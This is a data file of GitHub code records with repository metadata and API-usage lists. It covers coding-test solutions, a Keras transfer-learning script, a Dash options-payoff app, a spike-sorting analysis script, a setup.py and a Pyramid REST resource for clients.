"usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 202, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 202, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 210, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 210, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 223, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 223, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 230, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 230, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 238, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 238, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 254, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 254, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildPartialUpdate", "line_number": 267, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 267, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 276, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 276, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util.Get", "line_number": 303, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.environments_util", "line_number": 303, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 309, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 309, "usage_type": "name"}, {"api_name": "googlecloudsdk.command_lib.composer.util.BuildFullMapUpdate", "line_number": 321, "usage_type": "call"}, {"api_name": "googlecloudsdk.command_lib.composer.util", "line_number": 321, "usage_type": "name"}, {"api_name": "googlecloudsdk.calliope.base.ReleaseTrack", "line_number": 327, "usage_type": "attribute"}, {"api_name": "googlecloudsdk.calliope.base", "line_number": 327, "usage_type": "name"}, {"api_name": "googlecloudsdk.api_lib.composer.util.GetMessagesModule", "line_number": 338, "usage_type": "call"}, {"api_name": "googlecloudsdk.api_lib.composer.util", "line_number": 338, "usage_type": "name"}]} +{"seq_id": "3148603612", "text": "from collections import deque\n\ndef solution(queue1, queue2):\n answer = 0\n n = len(queue1)\n q1 = deque(queue1)\n q2 = deque(queue2)\n sum1 = sum(queue1)\n sum2 = sum(queue2)\n if (sum1+sum2)%2 == 1:\n return -1\n while True:\n if answer == 4*n:\n return -1\n if sum1 > sum2:\n value = q1.popleft()\n q2.append(value)\n sum1 -= value\n sum2 += value\n elif sum1 < sum2:\n value = q2.popleft()\n q1.append(value)\n sum1 += value\n sum2 -= value\n else:\n return answer\n answer += 1", "repo_name": "SongJungHyun1004/Coding_Test", "sub_path": "14주차/두 큐 합 같게 만들기.py", "file_name": "두 큐 합 같게 만들기.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"collections.deque", "line_number": 6, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "25375223572", "text": "import pickle\nimport tensorflow as tf\n# TODO: import Keras layers you need here\nfrom keras.layers import Input, Flatten, Dense\nfrom keras.models import Model\n\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\n\n# command line flags\nflags.DEFINE_string('training_file',\n 'vgg_cifar10_100_bottleneck_features_train.p',\n \"Bottleneck features training file (.p)\")\nflags.DEFINE_string('validation_file',\n 'vgg_cifar10_bottleneck_features_validation.p',\n \"Bottleneck features validation file (.p)\")\nflags.DEFINE_integer('epochs',\n 1,\n \"number of epoches\")\nflags.DEFINE_integer('batch_size',\n 32,\n \"batch size\")\n\n\n\ndef load_bottleneck_data(training_file, validation_file):\n \"\"\"\n Utility function to load bottleneck features.\n\n Arguments:\n training_file - String\n validation_file - String\n \"\"\"\n print(\"Training file\", training_file)\n print(\"Validation file\", validation_file)\n\n with open(training_file, 'rb') as f:\n train_data = pickle.load(f)\n with open(validation_file, 'rb') as f:\n validation_data = pickle.load(f)\n\n X_train = train_data['features']\n y_train = train_data['labels']\n X_val = validation_data['features']\n y_val = validation_data['labels']\n\n return X_train, y_train, X_val, y_val\n\n\ndef main(_):\n import numpy as np\n # load bottleneck data\n X_train, y_train, X_val, y_val = load_bottleneck_data(FLAGS.training_file, FLAGS.validation_file)\n\n print(X_train.shape, y_train.shape)\n print(X_val.shape, y_val.shape)\n\n nb_classes = len(np.unique(y_train))\n\n # define model\n input_shape = X_train.shape[1:]\n inp = Input(shape=input_shape)\n x = Flatten()(inp)\n x = Dense(nb_classes, activation='softmax')(x)\n model = Model(inp, x)\n model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n # train model\n model.fit(X_train, y_train, nb_epoch=FLAGS.epochs, batch_size=FLAGS.batch_size, validation_data=(X_val, y_val), shuffle=True)\n\n\n# parses flags and calls the `main` function above\nif __name__ == '__main__':\n from keras.datasets import cifar10\n from sklearn.model_selection import train_test_split\n \n tf.app.run()\n\n\n # 1) cifar10\n # Train on 1000 samples, validate on 10000 samples\n # 100 samples * 10 classes = 1000 training samples\n # VGG : loss: 0.0308 - acc: 1.0000 - val_loss: 0.9029 - val_acc: 0.7463\n # Inceltion : loss: 0.0129 - acc: 1.0000 - val_loss: 1.1957 - val_acc: 0.6625\n # resnet : loss: 0.0102 - acc: 1.0000 - val_loss: 0.8966 - val_acc: 0.7361\n\n # 2) Traffic Sign\n # Train on 4300 samples, validate on 12939 samples\n # 100 samples * 43 classes = 4300 training samples\n # VGG\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0873 - acc: 0.9958 - val_loss: 0.4368 - val_acc: 0.8666\n # Inception\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0276 - acc: 1.0000 - val_loss: 0.8378 - val_acc: 0.7519\n # ResNet\n # Epoch 50/50\n # 4300/4300 [==============================] - 0s - loss: 0.0332 - acc: 1.0000 - val_loss: 0.6146 - val_acc: 0.8108\n\n\n\n\n\n", "repo_name": "penny4860/CarND-Transfer-Learning-Lab", "sub_path": "feature_extraction.py", "file_name": "feature_extraction.py", "file_ext": "py", "file_size_in_byte": 3278, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"tensorflow.app", "line_number": 8, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 59, "usage_type": "call"}, {"api_name": "keras.layers.Input", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.layers.Flatten", "line_number": 64, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 65, "usage_type": "call"}, {"api_name": "keras.models.Model", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.app.run", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 78, "usage_type": "attribute"}]} +{"seq_id": "72565142594", "text": "'''\n\nDescription:\n\nGiven an integer, write a function to determine if it is a power of two.\n\nExample 1:\n\nInput: 1\nOutput: true \nExplanation: 20 = 1\n\n\n\nExample 2:\n\nInput: 16\nOutput: true\nExplanation: 24 = 16\n\n\n\nExample 3:\n\nInput: 218\nOutput: false\n\n'''\n\n\n\nclass Solution:\n def isPowerOfTwo(self, n: int) -> bool:\n \n if n <= 0:\n return False \n \n # note:\n # power of 2 in binary = b' 1000 ... 0\n # power of 2 minus 1 in binary = b' 0111 ... 1\n # bitwise AND of n and (n-1) must be 0 if n is power of 2\n \n return ( n & ( n-1 ) ) == 0\n\n\n\n# n : the value of Input\n\n## Time Complexity: O( log n )\n#\n# The overhead in time is the cost of bitwise operation, which is of O( log n )\n\n## Space Complexity: O( 1 )\n#\n# The overhead in space is the storage for temporary variable, which is of O( 1 )\n\n\n\nfrom collections import namedtuple\nTestEntry = namedtuple('TestEntry', 'n')\n\ndef test_bench():\n\n test_data = [\n TestEntry( n = -1 ), # False\n TestEntry( n = -2 ), # False\n TestEntry( n = 0 ), # False\n TestEntry( n = 1 ), # True\n TestEntry( n = 2 ), # True\n TestEntry( n = 3 ), # False\n TestEntry( n = 4 ), # True\n TestEntry( n = 218 ), # False\n TestEntry( n = 256 ), # True\n TestEntry( n = 1024 ), # True\n TestEntry( n = 1025 ), # False\n ]\n \n for t in test_data:\n\n print( Solution().isPowerOfTwo(t.n))\n\n return\n\n\n\nif __name__ == '__main__':\n\n test_bench()", "repo_name": "brianchiang-tw/leetcode", "sub_path": "2020_June_Leetcode_30_days_challenge/Week_2_Power of Two/by_bit_manipulation.py", "file_name": "by_bit_manipulation.py", "file_ext": "py", "file_size_in_byte": 1709, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 47, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.namedtuple", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "4304117327", "text": "from setuptools import setup, find_packages\nimport os\nimport platform\n\nDESCRIPTION = \"A Django email backend for SendCloud\"\n\nLONG_DESCRIPTION = None\ntry:\n LONG_DESCRIPTION = open('README.rst').read()\nexcept:\n pass\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Framework :: Django',\n]\n\nsetup(\n name='django-sendcloud',\n version='0.4',\n packages=['sendcloud'],\n author='jiaxin',\n author_email='jiaxin@guoku.com',\n url='http://github.com/guoku/django-sendcloud/',\n license='MIT',\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n platforms=['any'],\n install_requires=['requests==2.6.0', 'django==1.6.11'],\n 
classifiers=CLASSIFIERS,\n zip_safe = False,\n)\n\n__author__ = 'edison7500'\n", "repo_name": "guoku/django-sendcloud", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 982, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "setuptools.setup", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "72742391875", "text": "import dash\nfrom dash.dependencies import Input, Output, State\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objs as go\nfrom app import app, indicator, Graph\n\napp.config['suppress_callback_exceptions']=True\n\n\ndef update_graph(xvalues, yvalues, xtitle, ytitle):\n trace = go.Scatter(\n x = xvalues,\n y = yvalues,\n mode='lines',\n opacity=0.7,)\n layout = go.Layout(\n xaxis = {'title': xtitle},\n yaxis = {'title': ytitle},\n margin = {'l': 40, 'b': 40, 't': 10, 'r': 10},\n legend = {'x': 0, 'y': 1},\n annotations=[dict(x=xvalues[50], y=yvalues[50], xref='x', yref='y', text='Now', showarrow=True)],\n hovermode = 'closest')\n return {\"data\": [trace], \"layout\": layout}\n\n\ndef options_payoff(Call_Put_Flag, Long_Short_Flag, strike_price, spot, premium):\n sT = np.arange(spot - 50, spot + 50, 1)\n if Long_Short_Flag == 1:\n if Call_Put_Flag == 'Call':\n def payoff(sT, strike_price, premium):\n return np.where(sT > strike_price, sT - strike_price, 0) - premium\n payoff = payoff(sT, strike_price, premium)\n else:\n def payoff(sT, strike_price, premium):\n return np.where(sT < strike_price, strike_price - sT, 0) - premium\n payoff = payoff(sT, strike_price, premium)\n else:\n if Call_Put_Flag == 'Call':\n def payoff(sT, strike_price, premium):\n return np.where(sT > strike_price, -sT + strike_price, 0) + premium\n payoff = payoff(sT, strike_price, premium)\n else:\n def payoff(sT, strike_price, premium):\n return np.where(sT < strike_price, -strike_price + sT, 0) + premium\n payoff = payoff(sT, strike_price, premium)\n return payoff\n\n\ndef payoff_intrinsicValue(df):\n spot = 0\n payoff = np.zeros(100)\n premium_paid = 0\n for i in range(len(df)):\n strike = df['strike'][i]\n spot = df['Spot Price'][i]\n premium = (df['ask'][i] + df['bid'][i]) / 2\n long_short = df['Long_Short_Flag'][i]\n call_put = df['Call_Put_Flag'][i]\n\n payoff1 = options_payoff(call_put, long_short, strike, spot, premium)\n payoff = payoff1 + payoff\n if long_short == 1:\n premium_paid = premium_paid + premium\n else:\n premium_paid = premium_paid - premium\n\n intrinsic_value = payoff[50] + premium_paid\n sT = np.arange(spot - 50, spot + 50, 1)\n return sT.tolist(), payoff.tolist(), intrinsic_value\n\n\nlayout = [html.Div(Graph('Payoff', 'payoff'),className=\"row\",style={\"marginTop\": \"5px\"},),\n html.Div(indicator(\"#00cc96\", \"Intrinsic Value\", \"intrinsic_value\",), className=\"row\", style={\"marginTop\": \"5px\"},)]\n\n\n# payoff graph callback\n@app.callback(Output(\"payoff\", \"figure\"),\n [Input(\"options_df\", \"children\")],)\ndef payoff_graph_callback(df):\n df = pd.read_json(df, orient=\"split\")\n result_basics = payoff_intrinsicValue(df)\n return update_graph(result_basics[0], result_basics[1], 'Stock Price', 'Profit and Loss')\n\n\n# intrinsic value callback\n@app.callback(Output(\"intrinsic_value\", \"children\"),\n [Input(\"options_df\", \"children\")],)\ndef intrinsic_value_callback(df):\n df = pd.read_json(df, orient=\"split\")\n result_basics = 
payoff_intrinsicValue(df)\n return round(result_basics[2], 3)\n", "repo_name": "yh2334/Capstone-project-Derivatives-analyzer", "sub_path": "apps/basics.py", "file_name": "basics.py", "file_ext": "py", "file_size_in_byte": 3443, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "app.app.config", "line_number": 10, "usage_type": "attribute"}, {"api_name": "app.app", "line_number": 10, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Scatter", "line_number": 14, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 14, "usage_type": "name"}, {"api_name": "plotly.graph_objs.Layout", "line_number": 19, "usage_type": "call"}, {"api_name": "plotly.graph_objs", "line_number": 19, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 75, "usage_type": "call"}, {"api_name": "app.Graph", "line_number": 75, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 76, "usage_type": "call"}, {"api_name": "app.indicator", "line_number": 76, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 83, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 80, "usage_type": "call"}, {"api_name": "app.app", "line_number": 80, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 80, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.read_json", "line_number": 92, "usage_type": "call"}, {"api_name": "app.app.callback", "line_number": 89, "usage_type": "call"}, {"api_name": "app.app", "line_number": 89, "usage_type": "name"}, {"api_name": "dash.dependencies.Output", "line_number": 89, "usage_type": "call"}, {"api_name": "dash.dependencies.Input", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "738551915", "text": "from __future__ import print_function, absolute_import, division\nfrom spikesorting_tsne import preprocessing_kilosort_results as preproc\nfrom BrainDataAnalysis import ploting_functions as pf\nfrom t_sne_bhcuda import tsne_cluster as tsne_cl\nfrom spikesorting_tsne import io_with_cpp as io\nimport numpy as np\nfrom os.path import join\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport pandas as pd\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\n\n\nspike_info = preproc.generate_spike_info_from_full_tsne(base_folder, files_dir)\n\n\n\nspike_templates = np.load(join(base_folder, 'spike_templates.npy'))\ntemplate_markings = np.load(join(base_folder, 'template_marking.npy'))\nclean_templates_index = np.argwhere(template_markings > 0)\nclean_spikes_index = np.squeeze(np.argwhere(np.in1d(spike_templates, clean_templates_index)))\n\nnp.save(join(files_dir, 'indices_of_spikes_used.npy'), clean_spikes_index)\nspikes_used = np.load(join(files_dir, 'indices_of_spikes_used.npy'))\n\nbase_folder = 
r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nlabels_dict = pf.generate_labels_dict_from_cluster_info_dataframe(cluster_info=cluster_info)\n\ncluster_info = create_cluster_info_from_kilosort_spike_templates(join(base_folder, 'cluster_info.pkl'),\n spike_templates_clean)\n\n\ndef create_cluster_info_from_kilosort_spike_templates(cluster_info_filename, spike_templates):\n kilosort_units = {}\n for i in np.arange(len(spike_templates)):\n cluster = spike_templates[i][0]\n if cluster in kilosort_units:\n kilosort_units[cluster] = np.append(kilosort_units[cluster], i)\n else:\n kilosort_units[cluster] = i\n\n cluster_info = pd.DataFrame(columns=['Cluster', 'Num_of_Spikes', 'Spike_Indices'])\n cluster_info = cluster_info.set_index('Cluster')\n cluster_info['Spike_Indices'] = cluster_info['Spike_Indices'].astype(list)\n\n cluster_info.set_value('UNLABELED', 'Num_of_Spikes', 0)\n cluster_info.set_value('UNLABELED', 'Spike_Indices', [])\n cluster_info.set_value('NOISE', 'Num_of_Spikes', 0)\n cluster_info.set_value('NOISE', 'Spike_Indices', [])\n cluster_info.set_value('MUA', 'Num_of_Spikes', 0)\n cluster_info.set_value('MUA', 'Spike_Indices', [])\n for g in kilosort_units.keys():\n if np.size(kilosort_units[g]) == 1:\n kilosort_units[g] = [kilosort_units[g]]\n cluster_name = str(g)\n cluster_info.set_value(cluster_name, 'Num_of_Spikes', len(kilosort_units[g]))\n cluster_info.set_value(cluster_name, 'Spike_Indices', kilosort_units[g])\n\n cluster_info.to_pickle(cluster_info_filename)\n return cluster_info\n\n\n\nspike_templates = np.load(join(base_folder, 'spike_templates.npy'))\ntemplate_markings = np.load(join(base_folder, 'template_marking.npy'))\nclean_templates_index = np.argwhere(template_markings > 0)\nclean_spikes_index = np.squeeze(np.argwhere(np.in1d(spike_templates, clean_templates_index)))\n\nnp.save(join(files_dir, 'indices_of_spikes_used.npy'), clean_spikes_index)\nspikes_used = np.load(join(files_dir, 'indices_of_spikes_used.npy'))\n\nspike_templates_clean = spike_templates[spikes_used]\n\ncluster_info = tsne_cl.create_cluster_info_from_kilosort_spike_templates(join(base_folder, 'cluster_info.pkl'),\n spike_templates_clean)\nlabels_dict = pf.generate_labels_dict_from_cluster_info_dataframe(cluster_info=cluster_info)\n\n\ntsne = io.load_tsne_result(files_dir=files_dir)\n\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nfrom os.path import join\nimport numpy as np\n\nbase_folder = r'Z:\\n\\Neuroseeker Probe Recordings\\Neuroseeker_2017_08_08\\Analysis\\kilosort\\18_26_30_afterREFeachGroup'\n\nfiles_dir = join(base_folder, 'Tsne_Results')\n\nnp.sum(q)\nindices.shape\nr = np.in1d(spiketemplates,indices)\nindices.shape\nindices.max()\nindices.min()\nnp.sum(q)\nq.max()\nt.shape\nspiketemplates.shape\nclean_spike_indices.shape\nclean_spike_indices = np.argwhere(np.in1d(spiketemplates,indices))\nindices = np.argwhere(q)\nq = t>0\nspiketemplates = np.load(r\"F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup\\spike_templates.npy\")\nt= np.load(r\"F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup\\template_marking.npy\")\n\n\n\ncl.cleanup_kilosorted_data(r'F:\\kilosort_ch4\\kilosort\\18_26_30_afterREFeachGroup', 1440, r'F:\\kilosort_ch4\\18_26_30_afterREFeachGroup.bin', r'F:\\kilosort_ch4\\prb.txt',num_of_shanks_for_vis=3)\n", "repo_name": 
"georgedimitriadis/themeaningofbrain", "sub_path": "ExperimentSpecificCode/Joana Neto/Previous code/tsne_run.py", "file_name": "tsne_run.py", "file_ext": "py", "file_size_in_byte": 4768, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 9, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "spikesorting_tsne.preprocessing_kilosort_results.generate_spike_info_from_full_tsne", "line_number": 18, "usage_type": "call"}, {"api_name": "spikesorting_tsne.preprocessing_kilosort_results", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.load", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions.generate_labels_dict_from_cluster_info_dataframe", "line_number": 34, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions", "line_number": 34, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.size", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.save", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 77, "usage_type": "call"}, {"api_name": "t_sne_bhcuda.tsne_cluster.create_cluster_info_from_kilosort_spike_templates", "line_number": 81, "usage_type": "call"}, {"api_name": "t_sne_bhcuda.tsne_cluster", "line_number": 81, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions.generate_labels_dict_from_cluster_info_dataframe", "line_number": 83, "usage_type": "call"}, {"api_name": "BrainDataAnalysis.ploting_functions", "line_number": 
83, "usage_type": "name"}, {"api_name": "spikesorting_tsne.io_with_cpp.load_tsne_result", "line_number": 86, "usage_type": "call"}, {"api_name": "spikesorting_tsne.io_with_cpp", "line_number": 86, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.in1d", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "5698820326", "text": "# Baekjoon Online Judge - 1303번. 전쟁 - 전투\n\nfrom collections import deque\n\nN, M = map(int, input().split())\ndx = [-1, 1, 0, 0]\ndy = [0, 0, -1, 1]\nwar = [list(input()) for _ in range(M)]\nvisited = [[False] * N for _ in range(M)]\nresult = {'W': 0, 'B': 0}\nfor i in range(M):\n for j in range(N):\n if not visited[i][j]:\n visited[i][j] = True\n q = deque()\n q.append((i, j))\n cnt = 1\n color = war[i][j]\n while q:\n x, y = q.popleft()\n for k in range(4):\n nx = x + dx[k]\n ny = y + dy[k]\n if nx < 0 or nx >= M or ny < 0 or ny >= N:\n continue\n if not visited[nx][ny] and war[nx][ny] == color:\n cnt += 1\n visited[nx][ny] = True\n q.append((nx, ny))\n result[color] += (cnt * cnt)\nprint(*result.values())\n", "repo_name": "wnstj-yang/Algorithm", "sub_path": "BOJ/BOJ_1303.py", "file_name": "BOJ_1303.py", "file_ext": "py", "file_size_in_byte": 984, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "7883234831", "text": "from pyramid.security import (\n authenticated_userid,\n Allow,\n)\n\nfrom cornice.resource import resource, view\nfrom cornice.validators import (\n colander_body_validator,\n colander_path_validator,\n colander_validator,\n)\n\nfrom sqlalchemy import func\n\nfrom cw.database import User, Admin, Client, UserRole, UserType\nfrom cw.modules.security import hash_password\n\nfrom .schema import (\n CreateClientSchema,\n GetClientSchema,\n GetClientsSchema,\n UpdateClientValidatorSchema,\n)\n\nfrom .response_schema import (\n ResponseBodyClientSchema,\n ResponseBodyClientsSchema,\n)\n\nfrom .._shared.query import (\n apply_filter_sort_range_for_query,\n generate_range,\n)\n\nfrom .._shared.schema import (\n map_data_to_body_schema\n)\n\nfrom cw.modules.cornice import negotiation_params\n\n\n@resource(path=\"/client/{id}\", collection_path=\"/client\", description=\"Client resource\",\n tags=[\"client\"], **negotiation_params)\nclass ClientResource(object):\n def __init__(self, request, context=None):\n self.request = request\n\n def __acl__(self):\n return [\n (Allow, UserRole.admin, (\"get\", \"create\", \"update\",)),\n (Allow, UserRole.psychologist, (\"get\", \"create\", \"update\",)),\n ]\n\n @view(\n schema=GetClientSchema(),\n validators=(colander_path_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"Return OK response\"),\n },\n permission=\"get\",\n )\n def get(self):\n path_data = self.request.validated\n user = 
self.request.db.query(User).get(path_data['id'])\n user = dict(user)\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n\n @view(\n schema=GetClientsSchema(),\n validators=(colander_validator,),\n response_schemas={\n '200': ResponseBodyClientsSchema(description=\"Return OK response\"),\n },\n permission=\"get\",\n renderer='json'\n )\n def collection_get(self):\n data = self.request.validated['querystring']\n apply_range = True\n if data[\"filter\"].pop(\"no_range\", None):\n apply_range = False\n\n filter_for_client = (User.type == UserType.client) # noqa: E711\n users_query = self.request.db.query(User).with_polymorphic([Client]) \\\n .filter(filter_for_client)\n users_count_query = self.request.db.query(func.count(User.id)).filter(filter_for_client)\n users_query, users_count_query = apply_filter_sort_range_for_query(User, users_query, users_count_query,\n data=data, apply_range=apply_range)\n\n users = users_query.all()\n users_count = users_count_query.scalar()\n\n users = [dict(u) for u in users]\n\n if data.get(\"range\"):\n self.request.response.headers.add(\n \"Content-Range\",\n generate_range(data[\"range\"] if apply_range else False, users_count)\n )\n\n return map_data_to_body_schema(ResponseBodyClientsSchema, users)\n\n @view(\n schema=UpdateClientValidatorSchema(),\n validators=(colander_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"return OK response\")\n },\n permission=\"update\",\n )\n def put(self):\n body_data = self.request.validated[\"body\"]\n path_data = self.request.validated[\"path\"]\n\n user = self.request.db.query(Client).get(path_data[\"id\"])\n\n for key in body_data:\n if body_data[key] is None:\n continue\n setattr(user, key, body_data[key])\n\n self.request.db.flush()\n\n user = dict(user)\n\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n\n @view(\n schema=CreateClientSchema(),\n validators=(colander_body_validator,),\n response_schemas={\n '200': ResponseBodyClientSchema(description=\"return OK response\")\n },\n permission=\"create\",\n )\n def collection_post(self):\n manager_data = {**self.request.validated}\n manager_data[\"password\"] = hash_password(manager_data[\"password\"])\n user = Client(\n **manager_data,\n created_by=authenticated_userid(self.request)\n )\n self.request.db.add(user)\n self.request.db.flush()\n\n user = dict(user)\n\n return map_data_to_body_schema(ResponseBodyClientSchema, user)\n", "repo_name": "Eger37/course_work", "sub_path": "backend/cw/resources/client/resource.py", "file_name": "resource.py", "file_ext": "py", "file_size_in_byte": 4479, "program_lang": "python", "lang": "en", "doc_type": 